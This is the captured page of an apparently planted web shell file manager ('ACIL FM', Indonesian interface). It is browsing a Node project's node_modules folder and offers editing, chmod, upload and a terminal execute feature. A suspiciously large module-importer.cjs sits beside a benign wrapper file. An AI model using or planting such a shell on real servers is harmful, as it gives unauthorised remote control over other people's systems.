ACIL FM
Dark
Refresh
Current DIR:
/home/benbot/bot/server/node_modules/@humanwhocodes/module-importer/src
/
home
benbot
bot
server
node_modules
@humanwhocodes
module-importer
src
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
module-importer.cjs
2.51 MB
chmod
View
DL
Edit
Rename
Delete
module-importer.js
733 B
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/benbot/bot/server/node_modules/@humanwhocodes/module-importer/src/module-importer.js
/** * @fileoverview Universal module importer */ //----------------------------------------------------------------------------- // Imports //----------------------------------------------------------------------------- import { createRequire } from "module"; import { fileURLToPath } from "url"; import { dirname } from "path"; //----------------------------------------------------------------------------- // Helpers //----------------------------------------------------------------------------- const __filename = fileURLToPath(import.meta.url); const __dirname = dirname(__filename); const require = createRequire(__dirname + "/"); const { ModuleImporter } = require("./module-importer.cjs"); export { ModuleImporter };
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply